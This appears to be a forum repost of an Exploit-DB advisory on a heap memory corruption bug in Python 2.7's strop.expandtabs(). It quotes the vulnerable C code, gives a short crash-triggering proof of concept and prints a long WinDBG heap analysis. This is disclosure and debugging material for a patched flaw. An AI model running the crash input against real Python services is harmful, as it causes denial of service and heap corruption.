Exploit Python - Interpreter Heap Memory Corruption (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33251
Проверка EDB
  1. Пройдено
Автор
DEBASISH MANDAL
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
null
Дата публикации
2014-05-08
Код:
# Title: Python Interpreter Heap Memory Corruption
# Date: Sun, 30 Mar 2014 20:09:44 -0400
# Vulnerability Discovered By : Unknown 
# Proof of Concept : Debasish Mandal (https://twitter.com/debasishm89)
# Software Link: https://www.python.org/
# Version: All , Fix released (http://hg.python.org/cpython/rev/5dabc2d2f776)
# Tested on: Microsoft Windows XP Professional SP2 EN (32bit)

Recentl a new fix has been pushed to official python source code repository which fixes (http://hg.python.org/cpython/rev/5dabc2d2f776
) a memory corruption vulnerability in python interpreter's strop module. The vulnerability lies in expandtabs() functions. 
This is due to a missing check in line 626,627 of /Modules/stropmodule.c.

Vulnerable Code:

https://github.com/pgbovine/Py2crazy/blob/master/Python-2.7.5/Modules/stropmodule.c#L627

------------------------------------------------------------------------------------------------------------
    for (p = string; p < e; p++) {
        if (*p == '\t') {
            j += tabsize - (j%tabsize);
            if (old_j > j) {
                PyErr_SetString(PyExc_OverflowError,
                                "new string is too long");
                return NULL;
            }
            old_j = j;
        } else {
            j++;
            if (*p == '\n') {
		// Missing check 
                i += j;  
                j = 0;
            }
        }
    }
------------------------------------------------------------------------------------------------------------

Patch Diff:
http://hg.python.org/cpython/diff/5dabc2d2f776/Modules/stropmodule.c


=================
Proof of Concept:
=================

Running below code will crash the vulnerable python.exe process.

import strop
raw_input('Press Enter to BOOM!')
a = '\t\n' * 65536
strop.expandtabs(a, 65536)

============================
Crash Analysis using WinDBG:
============================

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: SRV*E:\symbol*http://msdl.microsoft.com/download/symbols
Executable search path is: 
ModLoad: 1d000000 1d00a000   C:\Python27\python.exe
ModLoad: 7c900000 7c9b0000   C:\WINDOWS\system32\ntdll.dll
ModLoad: 7c800000 7c8f4000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 1e000000 1e227000   C:\WINDOWS\system32\python27.dll
ModLoad: 77d40000 77dd0000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f56000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f01000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 7c9c0000 7d1d4000   C:\WINDOWS\system32\SHELL32.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 78520000 785c3000   C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\MSVCR90.dll
ModLoad: 773d0000 774d2000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
ModLoad: 5d090000 5d127000   C:\WINDOWS\system32\comctl32.dll
(f0.320): Break instruction exception - code 80000003 (first chance)
eax=7ffd6000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
eip=7c901230 esp=023dffcc ebp=023dfff4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
7c901230 cc              int     3
0:001> g
(f0.1f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=20202020 ebx=0263bffe ecx=00003fff edx=00000001 esi=00010000 edi=025cf000
eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
MSVCR90!memset+0x5f:
7855b37f f3ab            rep stos dword ptr es:[edi]

We can see we have a write access violation at MSVCR90!memset+0x5f:

Crash stack trace:

0:000> kb
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\python27.dll - 
ChildEBP RetAddr  Args to Child              
0021fce4 1e0483e2 025ceffd 00000020 00010000 MSVCR90!memset+0x5f
WARNING: Stack unwind information not available. Following frames may be wrong.
0021fd1c 1e08883b 00000000 022e7cd8 022eb5a8 python27!PyOS_AfterFork+0xc9f
0021fd38 1e0bf781 022eb5a8 022e7cd8 00000000 python27!PyCFunction_Call+0x138
0021fd60 1e0bcb94 1e0bd826 0021fdc4 01e280f8 python27!PyEval_GetFuncDesc+0x341
0021fd64 1e0bd826 0021fdc4 01e280f8 02663ff0 python27!PyEval_EvalFrameEx+0x18e4
0021fdd8 1e0be200 0021fe20 1e0be82e 02663eb8 python27!PyEval_EvalFrameEx+0x2576
0021fde0 1e0be82e 02663eb8 00000000 0261e2c0 python27!PyEval_EvalCodeEx+0x50
0021fe20 1e0bb295 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCodeEx+0x67e
0021fe54 1e0e0d68 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCode+0x25
0021fe70 1e0e0d36 0261e2c0 01de2ff3 01e1e6f0 python27!PyRun_FileExFlags+0x97
0021fe9c 1e0e0329 785b7408 01de2ff3 00000101 python27!PyRun_FileExFlags+0x65
0021fed8 1e0dff3e 785b7408 01de2ff3 00000001 python27!PyRun_SimpleFileExFlags+0x133
0021fef8 1e02f5df 785b7408 01de2ff3 00000001 python27!PyRun_AnyFileExFlags+0x4c
*** ERROR: Module load completed but symbols could not be loaded for C:\Python27\python.exe
0021ff7c 1d001160 00000002 01de2fd0 01d9ef80 python27!Py_Main+0x805
0021ffc0 7c816d4f 00090000 01fa0cda 7ffd6000 python+0x1160
0021fff0 00000000 1d0012a8 00000000 78746341 kernel32!BaseProcessStart+0x23

We crashed inside MSVCR90!memset

After that we restart the app and set a break point at memset.

0:001> bp MSVCR90!memset
0:001> g
Breakpoint 0 hit
eax=00aada58 ebx=00000014 ecx=00000014 edx=00000a98 esi=1e1e0658 edi=00aada58
eip=7855b320 esp=0021fbe8 ebp=0021fc30 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000202
MSVCR90!memset:
7855b320 8b54240c        mov     edx,dword ptr [esp+0Ch] ss:0023:0021fbf4=00000014

Partial Dis assembly of memset caller:

.text:1E0483D0                 sub     esi, edx
.text:1E0483D2                 add     [ebp+var_4], esi
.text:1E0483D5                 test    esi, esi
.text:1E0483D7                 jle     short loc_1E0483F8
.text:1E0483D9                 push    esi             ; Size
.text:1E0483DA                 push    20h             ; Val
.text:1E0483DC                 push    edi             ; Dst
.text:1E0483DD                 call    memset
.text:1E0483E2                 add     esp, 0Ch
.text:1E0483E5                 add     edi, esi
.text:1E0483E7                 jmp     short loc_1E0483F8
.tex

edi=00aada58 is pointing to destination where final string is getting copied. 

0:000> dd esp
0021fbe8  1e0978ad 00aada58 00000000 00000014
0021fbf8  00a81310 1e0977a2 1e1e0658 1e075222
0021fc08  1e1e0658 00000000 1e0977a2 1e0977dc
0021fc18  1e1e0658 00a81310 00000000 1e1e0658
0021fc28  1e0977a2 00aa8e40 0021fc9c 1e0650fe
0021fc38  1e1e0658 00a81310 00000000 009aabf0
0021fc48  00a81310 1e06518c 1e1e0658 00a81310
0021fc58  00000000 009aabf0 00000000 1e0651d9


0:000> !address 00aada58
    00a80000 : 00a80000 - 0004b000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   00970000


It's confirmed that the memset() is actually trying write to heap. After few calls to memset the python.exe process will crash.

0:000> g
(7d8.44c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=20202020 ebx=00adbf66 ecx=000037e1 edx=00000001 esi=00010000 edi=00b0e000
eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
MSVCR90!memset+0x5f:
7855b37f f3ab            rep stos dword ptr es:[edi]

=========================================
Verify memory corruption using bang heap:
=========================================

0:000> !heap -s
  Heap     Flags   Reserv  Commit  Virt   Free  List   UCR  Virt  Lock  Fast 
                    (k)     (k)    (k)     (k) length      blocks cont. heap 
-----------------------------------------------------------------------------
00240000 00000002    1024     32     32      8     1     1    0      0   L  
00340000 00001002      64     24     24     13     1     1    0      0   L  
00350000 00008000      64     12     12     10     1     1    0      0      
00930000 00001002      64     16     16      2     1     1    0      0   L  
00950000 00001002      64     16     16      2     2     1    0      0   L  
00970000 00001002    3136   1644   1656     33     3     2    0      0   L  
-----------------------------------------------------------------------------

0x00240000  is Default Process Heap. From the size of commited bytes we can say 0x00970000 handling a large number of data.

0:000> !heap -a 00970000
Index   Address  Name      Debugging options enabled
  6:   00970000 
    Segment at 00970000 to 00980000 (00010000 bytes committed)
    Segment at 00980000 to 00a80000 (00100000 bytes committed)
    Segment at 00a80000 to 00c80000 (0008b000 bytes committed)
    Flags:                00001002
    ForceFlags:           00000000
    Granularity:          8 bytes
    Segment Reserve:      00400000
    Segment Commit:       00002000
    DeCommit Block Thres: 00000200
    DeCommit Total Thres: 00002000
    Total Free Size:      000010df
    Max. Allocation Size: 7ffdefff
    Lock Variable at:     00970608
    Next TagIndex:        0000
    Maximum TagIndex:     0000
    Tag Entries:          00000000
    PsuedoTag Entries:    00000000
    Virtual Alloc List:   00970050
    UCR FreeList:        00970598
    FreeList Usage:      84091158 00001001 00000000 80000000
    FreeList[ 00 ] at 00970178: 00ac5eb8 . 00a6f8d8  
        00a6f8d0: 01008 . 00ad8 [00] - free
        00b0bf88: 10100 . 10100 [20] - free
    Unable to read nt!_HEAP_FREE_ENTRY structure at 20202018
    FreeList[ 03 ] at 00970190: 00a38ff0 . 00a57fe0  
        00a57fd8: 00048 . 00018 [00] - free
        00a38fe8: 00048 . 00018 [00] - free
    FreeList[ 04 ] at 00970198: 009c1fe8 . 009c1fe8  
        009c1fe0: 00188 . 00020 [00] - free
    FreeList[ 06 ] at 009701a8: 00acf128 . 00acf128  
        00acf120: 00130 . 00030 [00] - free
    FreeList[ 08 ] at 009701b8: 00a58fb8 . 00a58fb8  
        00a58fb0: 00010 . 00040 [00] - free
    FreeList[ 0c ] at 009701d8: 009cb980 . 009cb980  
        009cb978: 00010 . 00060 [00] - free
    FreeList[ 10 ] at 009701f8: 009c7588 . 009c7588  
        009c7580: 00178 . 00080 [00] - free
    FreeList[ 13 ] at 00970210: 00a2af50 . 00a2af50  
        00a2af48: 000c8 . 00098 [00] - free
    FreeList[ 1a ] at 00970248: 00ac5a68 . 00ac5a68  
        00ac5a60: 00170 . 000d0 [00] - free
    FreeList[ 1f ] at 00970270: 00a71990 . 00a71990  
        00a71988: 00188 . 000f8 [00] - free
    FreeList[ 20 ] at 00970278: 00a78c78 . 00a78c78  
        00a78c70: 00188 . 00100 [00] - free
    FreeList[ 2c ] at 009702d8: 009d8788 . 009d8788  
        009d8780: 001d0 . 00160 [00] - free
    FreeList[ 7f ] at 00970570: 00a7a3c0 . 00a7a3c0  
        00a7a3b8: 00220 . 003f8 [00] - free
    Segment00 at 00970640:
        Flags:           00000000
        Base:            00970000
        First Entry:     00970680
        Last Entry:      00980000
        Total Pages:     00000010
        Total UnCommit:  00000000
        Largest UnCommit:00000000
        UnCommitted Ranges: (0)

    Heap entries for Segment00 in Heap 00970000
        00970000: 00000 . 00640 [01] - busy (640)
        00970640: 00640 . 00040 [01] - busy (40)
        00970680: 00040 . 01808 [01] - busy (1800)
        00971e88: 01808 . 00220 [01] - busy (214)
        009720a8: 00220 . 00808 [01] - busy (800)
        009728b0: 00808 . 001c8 [01] - busy (1c0)
        00972a78: 001c8 . 00188 [01] - busy (180)
        00972c00: 00188 . 00010 [01] - busy (4)
        00972c10: 00010 . 00010 [01] - busy (4)
        00972c20: 00010 . 00010 [01] - busy (4)
        00972c30: 00010 . 00018 [01] - busy (10)
        00972c48: 00018 . 00020 [01] - busy (18)
        00972c68: 00020 . 00018 [01] - busy (10)
        00972c80: 00018 . 00018 [01] - busy (10)
        00972c98: 00018 . 00028 [01] - busy (20)
        00972cc0: 00028 . 00018 [01] - busy (c)
        00972cd8: 00018 . 00010 [01] - busy (8)
        00972ce8: 00010 . 00228 [01] - busy (220)
        00972f10: 00228 . 00088 [01] - busy (7c)
        00972f98: 00088 . 00040 [01] - busy (34)
        00972fd8: 00040 . 00050 [01] - busy (43)
        00973028: 00050 . 00020 [01] - busy (13)
        00973048: 00020 . 00040 [01] - busy (31)
        00973088: 00040 . 00028 [01] - busy (1d)
        009730b0: 00028 . 00030 [01] - busy (24)
        009730e0: 00030 . 00020 [01] - busy (14)
        00973100: 00020 . 00020 [01] - busy (12)
        00973120: 00020 . 00018 [01] - busy (d)
        00973138: 00018 . 00040 [01] - busy (31)
        00973178: 00040 . 00028 [01] - busy (1e)
        009731a0: 00028 . 00020 [01] - busy (17)
        009731c0: 00020 . 00018 [01] - busy (e)
        009731d8: 00018 . 00098 [01] - busy (8a)
        00973270: 00098 . 00048 [01] - busy (39)
        009732b8: 00048 . 00028 [01] - busy (1b)
        009732e0: 00028 . 00050 [01] - busy (45)
        00973330: 00050 . 00020 [01] - busy (12)
        00973350: 00020 . 00020 [01] - busy (18)
        00973370: 00020 . 00028 [01] - busy (1e)
        00973398: 00028 . 00020 [01] - busy (13)
        009733b8: 00020 . 00020 [01] - busy (14)
        009733d8: 00020 . 00018 [01] - busy (f)
        009733f0: 00018 . 00020 [01] - busy (16)
        00973410: 00020 . 00030 [01] - busy (28)
        00973440: 00030 . 00030 [01] - busy (27)
        00973470: 00030 . 00028 [01] - busy (1b)
        00973498: 00028 . 00028 [01] - busy (19)
        009734c0: 00028 . 00040 [01] - busy (36)
        00973500: 00040 . 00020 [01] - busy (12)
        00973520: 00020 . 00808 [01] - busy (800)
        00973d28: 00808 . 00088 [01] - busy (80)
        00973db0: 00088 . 00088 [01] - busy (80)
        00973e38: 00088 . 00038 [01] - busy (30)
        00973e70: 00038 . 00030 [01] - busy (24)
        00973ea0: 00030 . 00018 [01] - busy (c)
        00973eb8: 00018 . 00060 [01] - busy (54)
        00973f18: 00060 . 00188 [01] - busy (180)
        009740a0: 00188 . 00608 [01] - busy (600)
        009746a8: 00608 . 00608 [01] - busy (600)
        00974cb0: 00608 . 00608 [01] - busy (600)
        009752b8: 00608 . 00208 [01] - busy (1fd)
        009754c0: 00208 . 00188 [01] - busy (180)
        00975648: 00188 . 00608 [01] - busy (600)
        00975c50: 00608 . 00608 [01] - busy (600)
        00976258: 00608 . 00228 [01] - busy (219)
        00976480: 00228 . 00608 [01] - busy (600)
        00976a88: 00608 . 00048 [01] - busy (3c)
        00976ad0: 00048 . 00150 [01] - busy (145)
        00976c20: 00150 . 00188 [01] - busy (180)
        00976da8: 00188 . 00110 [01] - busy (107)
        00976eb8: 00110 . 00188 [01] - busy (180)
        00977040: 00188 . 00608 [01] - busy (600)
        00977648: 00608 . 00190 [01] - busy (187)
        009777d8: 00190 . 00608 [01] - busy (600)
        00977de0: 00608 . 00608 [01] - busy (600)
        009783e8: 00608 . 00110 [01] - busy (103)
        009784f8: 00110 . 00220 [01] - busy (216)
        00978718: 00220 . 00188 [01] - busy (180)
        009788a0: 00188 . 00070 [01] - busy (64)
        00978910: 00070 . 00188 [01] - busy (180)
        00978a98: 00188 . 00608 [01] - busy (600)
        009790a0: 00608 . 00608 [01] - busy (600)
        009796a8: 00608 . 00148 [01] - busy (13b)
        009797f0: 00148 . 00188 [01] - busy (180)
        00979978: 00188 . 00608 [01] - busy (600)
        00979f80: 00608 . 00170 [01] - busy (162)
        0097a0f0: 00170 . 00608 [01] - busy (600)
        0097a6f8: 00608 . 00188 [01] - busy (180)
        0097a880: 00188 . 00608 [01] - busy (600)
        0097ae88: 00608 . 00608 [01] - busy (600)
        0097b490: 00608 . 001a8 [01] - busy (19c)
        0097b638: 001a8 . 00098 [01] - busy (8c)
        0097b6d0: 00098 . 00188 [01] - busy (180)
        0097b858: 00188 . 00608 [01] - busy (600)
        0097be60: 00608 . 00188 [01] - busy (180)
        0097bfe8: 00188 . 00188 [01] - busy (180)
        0097c170: 00188 . 00188 [01] - busy (180)
        0097c2f8: 00188 . 00608 [01] - busy (600)
        0097c900: 00608 . 00188 [01] - busy (180)
        0097ca88: 00188 . 00608 [01] - busy (600)
        0097d090: 00608 . 00188 [01] - busy (180)
        0097d218: 00188 . 000c0 [01] - busy (b8)
        0097d2d8: 000c0 . 00188 [01] - busy (180)
        0097d460: 00188 . 00188 [01] - busy (180)
        0097d5e8: 00188 . 00608 [01] - busy (600)
        0097dbf0: 00608 . 00188 [01] - busy (180)
        0097dd78: 00188 . 00608 [01] - busy (600)
        0097e380: 00608 . 003d8 [01] - busy (3ce)
        0097e758: 003d8 . 003e8 [01] - busy (3dc)
        0097eb40: 003e8 . 003e8 [01] - busy (3dc)
        0097ef28: 003e8 . 003e8 [01] - busy (3dc)
        0097f310: 003e8 . 003e8 [01] - busy (3dc)
        0097f6f8: 003e8 . 00608 [01] - busy (600)
        0097fd00: 00608 . 000f8 [01] - busy (f0)
        0097fdf8: 000f8 . 00150 [01] - busy (148)
        0097ff48: 00150 . 00038 [01] - busy (30)
        0097ff80: 00038 . 00080 [11] - busy (78)
    Segment01 at 00980000:
        Flags:           00000000
        Base:            00980000
        First Entry:     00980040
        Last Entry:      00a80000
        Total Pages:     00000100
        Total UnCommit:  00000000
        Largest UnCommit:00000000
        UnCommitted Ranges: (0)

    Heap entries for Segment01 in Heap 00970000
        00980000: 00000 . 00040 [01] - busy (40)
        00980040: 00040 . 40008 [01] - busy (40000)
        009c0048: 40008 . 00608 [01] - busy (600)
        009c0650: 00608 . 01808 [01] - busy (1800)
        009c1e58: 01808 . 00188 [01] - busy (180)
        009c1fe0: 00188 . 00020 [00]
        009c2000: 00020 . 00608 [01] - busy (600)
        009c2608: 00608 . 00608 [01] - busy (600)
        009c2c10: 00608 . 00608 [01] - busy (600)
        009c3218: 00608 . 01808 [01] - busy (1800)
        009c4a20: 01808 . 00160 [01] - busy (158)
        009c4b80: 00160 . 00188 [01] - busy (180)
        009c4d08: 00188 . 00160 [01] - busy (158)
        009c4e68: 00160 . 00188 [01] - busy (180)
        009c4ff0: 00188 . 00608 [01] - busy (600)
        009c55f8: 00608 . 01808 [01] - busy (1800)
        009c6e00: 01808 . 00608 [01] - busy (600)
        009c7408: 00608 . 00178 [01] - busy (16c)
        009c7580: 00178 . 00080 [00]
        009c7600: 00080 . 002e8 [01] - busy (2df)
        009c78e8: 002e8 . 00198 [01] - busy (18a)
        009c7a80: 00198 . 00220 [01] - busy (214)
        009c7ca0: 00220 . 00200 [01] - busy (1f8)
        009c7ea0: 00200 . 001d0 [01] - busy (1c1)
        009c8070: 001d0 . 00260 [01] - busy (257)
        009c82d0: 00260 . 001d8 [01] - busy (1cb)
        009c84a8: 001d8 . 00168 [01] - busy (160)
        009c8610: 00168 . 00188 [01] - busy (180)
        009c8798: 00188 . 001b0 [01] - busy (1a8)
        009c8948: 001b0 . 001a8 [01] - busy (19d)
        009c8af0: 001a8 . 000c8 [01] - busy (c0)
        009c8bb8: 000c8 . 00050 [01] - busy (48)
        009c8c08: 00050 . 00010 [01] - busy (4)
        009c8c18: 00010 . 00f88 [01] - busy (f7f)
        009c9ba0: 00f88 . 00090 [01] - busy (82)
        009c9c30: 00090 . 003f0 [01] - busy (3e8)
        009ca020: 003f0 . 00128 [01] - busy (120)
        009ca148: 00128 . 00120 [01] - busy (114)
        009ca268: 00120 . 00608 [01] - busy (600)
        009ca870: 00608 . 00148 [01] - busy (140)
        009ca9b8: 00148 . 00608 [01] - busy (600)
        009cafc0: 00608 . 000d0 [01] - busy (c8)
        009cb090: 000d0 . 00608 [01] - busy (600)
        009cb698: 00608 . 00250 [01] - busy (247)
        009cb8e8: 00250 . 00018 [01] - busy (10)
        009cb900: 00018 . 00018 [01] - busy (10)
        009cb918: 00018 . 00020 [01] - busy (18)
        009cb938: 00020 . 00018 [01] - busy (10)
        009cb950: 00018 . 00018 [01] - busy (10)
        009cb968: 00018 . 00010 [01] - busy (2)
        009cb978: 00010 . 00060 [00]
        009cb9d8: 00060 . 00608 [01] - busy (600)
        009cbfe0: 00608 . 00048 [01] - busy (3c)
        009cc028: 00048 . 00020 [01] - busy (18)
        009cc048: 00020 . 00018 [01] - busy (10)
        009cc060: 00018 . 00018 [01] - busy (10)
        009cc078: 00018 . 00188 [01] - busy (180)
        009cc200: 00188 . 00030 [01] - busy (24)
        009cc230: 00030 . 00018 [01] - busy (10)
        009cc248: 00018 . 00188 [01] - busy (180)
        009cc3d0: 00188 . 00030 [01] - busy (22)
        009cc400: 00030 . 00018 [01] - busy (10)
        009cc418: 00018 . 00028 [01] - busy (20)
        009cc440: 00028 . 00018 [01] - busy (10)
        009cc458: 00018 . 00188 [01] - busy (180)
        009cc5e0: 00188 . 00018 [01] - busy (10)
        009cc5f8: 00018 . 00018 [01] - busy (10)
        009cc610: 00018 . 00048 [01] - busy (40)
        009cc658: 00048 . 00018 [01] - busy (10)
        009cc670: 00018 . 00188 [01] - busy (180)
        009cc7f8: 00188 . 00018 [01] - busy (10)
        009cc810: 00018 . 00188 [01] - busy (180)
        009cc998: 00188 . 00018 [01] - busy (10)
        009cc9b0: 00018 . 00188 [01] - busy (180)
        009ccb38: 00188 . 00018 [01] - busy (c)
        009ccb50: 00018 . 00018 [01] - busy (10)
        009ccb68: 00018 . 00048 [01] - busy (40)
        009ccbb0: 00048 . 00130 [01] - busy (127)
        009ccce0: 00130 . 00188 [01] - busy (180)
        009cce68: 00188 . 00018 [01] - busy (10)
        009cce80: 00018 . 00188 [01] - busy (180)
        009cd008: 00188 . 00608 [01] - busy (600)
        009cd610: 00608 . 00608 [01] - busy (600)
        009cdc18: 00608 . 01808 [01] - busy (1800)
        009cf420: 01808 . 001f8 [01] - busy (1ef)
        009cf618: 001f8 . 00270 [01] - busy (264)
        009cf888: 00270 . 001e0 [01] - busy (1d8)
        009cfa68: 001e0 . 00188 [01] - busy (180)
        009cfbf0: 00188 . 000c8 [01] - busy (c0)
        009cfcb8: 000c8 . 00188 [01] - busy (180)
        009cfe40: 00188 . 005d8 [01] - busy (5ca)
        009d0418: 005d8 . 00080 [01] - busy (78)
        009d0498: 00080 . 00308 [01] - busy (300)
        009d07a0: 00308 . 00188 [01] - busy (180)
        009d0928: 00188 . 00018 [01] - busy (10)
        009d0940: 00018 . 00188 [01] - busy (180)
        009d0ac8: 00188 . 00020 [01] - busy (18)
        009d0ae8: 00020 . 00c10 [01] - busy (c00)
        009d16f8: 00c10 . 003e8 [01] - busy (3dc)
        009d1ae0: 003e8 . 00010 [01] - busy (4)
        009d1af0: 00010 . 00260 [01] - busy (255)
        009d1d50: 00260 . 000f0 [01] - busy (e8)
        009d1e40: 000f0 . 00158 [01] - busy (14f)
        009d1f98: 00158 . 00a60 [01] - busy (a51)
        009d29f8: 00a60 . 00168 [01] - busy (160)
        009d2b60: 00168 . 00178 [01] - busy (16f)
        009d2cd8: 00178 . 00258 [01] - busy (24d)
        009d2f30: 00258 . 00138 [01] - busy (12b)
        009d3068: 00138 . 00158 [01] - busy (150)
        009d31c0: 00158 . 00158 [01] - busy (14a)
        009d3318: 00158 . 00180 [01] - busy (178)
        009d3498: 00180 . 00138 [01] - busy (12b)
        009d35d0: 00138 . 00158 [01] - busy (14f)
        009d3728: 00158 . 00178 [01] - busy (16c)
        009d38a0: 00178 . 00180 [01] - busy (178)
        009d3a20: 00180 . 001f0 [01] - busy (1e4)
        009d3c10: 001f0 . 002c0 [01] - busy (2b4)
        009d3ed0: 002c0 . 00200 [01] - busy (1f8)
        009d40d0: 00200 . 001f8 [01] - busy (1f0)
        009d42c8: 001f8 . 01808 [01] - busy (1800)
        009d5ad0: 01808 . 00608 [01] - busy (600)
        009d60d8: 00608 . 00608 [01] - busy (600)
        009d66e0: 00608 . 000e8 [01] - busy (dc)
        009d67c8: 000e8 . 00018 [01] - busy (c)
        009d67e0: 00018 . 00030 [01] - busy (28)
        009d6810: 00030 . 00198 [01] - busy (18e)
        009d69a8: 00198 . 00970 [01] - busy (963)
        009d7318: 00970 . 000c0 [01] - busy (b8)
        009d73d8: 000c0 . 001d8 [01] - busy (1cf)
        009d75b0: 001d8 . 00128 [01] - busy (11d)
        009d76d8: 00128 . 00110 [01] - busy (104)
        009d77e8: 00110 . 00168 [01] - busy (15a)
        009d7950: 00168 . 00150 [01] - busy (141)
        009d7aa0: 00150 . 001b0 [01] - busy (1a4)
        009d7c50: 001b0 . 00198 [01] - busy (18d)
        009d7de8: 00198 . 00148 [01] - busy (140)
        009d7f30: 00148 . 003b0 [01] - busy (3a4)
        009d82e0: 003b0 . 00110 [01] - busy (105)

        009d83f0: 00110 . 001c0 [01] - busy (1b1)
        009d85b0: 001c0 . 001d0 [01] - busy (1c7)
        009d8780: 001d0 . 00160 [00]
        009d88e0: 00160 . 00018 [01] - busy (c)
        009d88f8: 00018 . 00188 [01] - busy (180)
        009d8a80: 00188 . 00020 [01] - busy (18)
        009d8aa0: 00020 . 01808 [01] - busy (1800)
        009da2a8: 01808 . 00608 [01] - busy (600)
        009da8b0: 00608 . 001a8 [01] - busy (19a)
        009daa58: 001a8 . 00608 [01] - busy (600)
        009db060: 00608 . 00140 [01] - busy (133)
        009db1a0: 00140 . 00c08 [01] - busy (c00)
        009dbda8: 00c08 . 00158 [01] - busy (14d)
        009dbf00: 00158 . 00160 [01] - busy (155)
        009dc060: 00160 . 00368 [01] - busy (35e)
        009dc3c8: 00368 . 00140 [01] - busy (132)
        009dc508: 00140 . 01808 [01] - busy (1800)
        009ddd10: 01808 . 00170 [01] - busy (168)
        009dde80: 00170 . 00130 [01] - busy (124)
        009ddfb0: 00130 . 00018 [01] - busy (10)
        009ddfc8: 00018 . 00018 [01] - busy (4)
        009ddfe0: 00018 . 00188 [01] - busy (180)
        009de168: 00188 . 00188 [01] - busy (180)
        009de2f0: 00188 . 00188 [01] - busy (180)
        009de478: 00188 . 00608 [01] - busy (600)
        009dea80: 00608 . 00158 [01] - busy (150)
        009debd8: 00158 . 00020 [01] - busy (18)
        009debf8: 00020 . 00020 [01] - busy (14)
        009dec18: 00020 . 00018 [01] - busy (10)
        009dec30: 00018 . 00020 [01] - busy (18)
        009dec50: 00020 . 00018 [01] - busy (10)
        009dec68: 00018 . 00018 [01] - busy (10)
        009dec80: 00018 . 00018 [01] - busy (10)
        009dec98: 00018 . 00010 [01] - busy (4)
        009deca8: 00010 . 00070 [01] - busy (64)
        009ded18: 00070 . 00198 [01] - busy (18c)
        009deeb0: 00198 . 00020 [01] - busy (18)
        009deed0: 00020 . 000f0 [01] - busy (e8)
        009defc0: 000f0 . 00210 [01] - busy (202)
        009df1d0: 00210 . 00218 [01] - busy (20e)
        009df3e8: 00218 . 00238 [01] - busy (229)
        009df620: 00238 . 000d0 [01] - busy (c0)
        009df6f0: 000d0 . 004a0 [01] - busy (498)
        009dfb90: 004a0 . 00098 [01] - busy (90)
        009dfc28: 00098 . 00120 [01] - busy (117)
        009dfd48: 00120 . 001d0 [01] - busy (1c1)
        009dff18: 001d0 . 40008 [01] - busy (40000)
        00a1ff20: 40008 . 00330 [01] - busy (324)
        00a20250: 00330 . 00188 [01] - busy (180)
        00a203d8: 00188 . 00150 [01] - busy (145)
        00a20528: 00150 . 00190 [01] - busy (188)
        00a206b8: 00190 . 00188 [01] - busy (180)
        00a20840: 00188 . 00218 [01] - busy (210)
        00a20a58: 00218 . 00188 [01] - busy (180)
        00a20be0: 00188 . 00188 [01] - busy (180)
        00a20d68: 00188 . 00040 [01] - busy (38)
        00a20da8: 00040 . 00120 [01] - busy (117)
        00a20ec8: 00120 . 00020 [01] - busy (18)
        00a20ee8: 00020 . 000e8 [01] - busy (dc)
        00a20fd0: 000e8 . 00608 [01] - busy (600)
        00a215d8: 00608 . 00178 [01] - busy (170)
        00a21750: 00178 . 00270 [01] - busy (268)
        00a219c0: 00270 . 00078 [01] - busy (64)
        00a21a38: 00078 . 00190 [01] - busy (184)
        00a21bc8: 00190 . 00608 [01] - busy (600)
        00a221d0: 00608 . 00188 [01] - busy (180)
        00a22358: 00188 . 00188 [01] - busy (180)
        00a224e0: 00188 . 001e0 [01] - busy (1d8)
        00a226c0: 001e0 . 00188 [01] - busy (180)
        00a22848: 00188 . 00120 [01] - busy (117)
        00a22968: 00120 . 00028 [01] - busy (20)
        00a22990: 00028 . 00018 [01] - busy (c)
        00a229a8: 00018 . 00188 [01] - busy (180)
        00a22b30: 00188 . 00018 [01] - busy (10)
        00a22b48: 00018 . 00020 [01] - busy (14)
        00a22b68: 00020 . 00020 [01] - busy (14)
        00a22b88: 00020 . 00048 [01] - busy (40)
        00a22bd0: 00048 . 00288 [01] - busy (27b)
        00a22e58: 00288 . 00250 [01] - busy (244)
        00a230a8: 00250 . 00148 [01] - busy (140)
        00a231f0: 00148 . 001e0 [01] - busy (1d8)
        00a233d0: 001e0 . 00608 [01] - busy (600)
        00a239d8: 00608 . 00170 [01] - busy (164)
        00a23b48: 00170 . 001e0 [01] - busy (1d8)
        00a23d28: 001e0 . 00070 [01] - busy (62)
        00a23d98: 00070 . 00148 [01] - busy (13a)
        00a23ee0: 00148 . 000f0 [01] - busy (e8)
        00a23fd0: 000f0 . 001b0 [01] - busy (1a4)
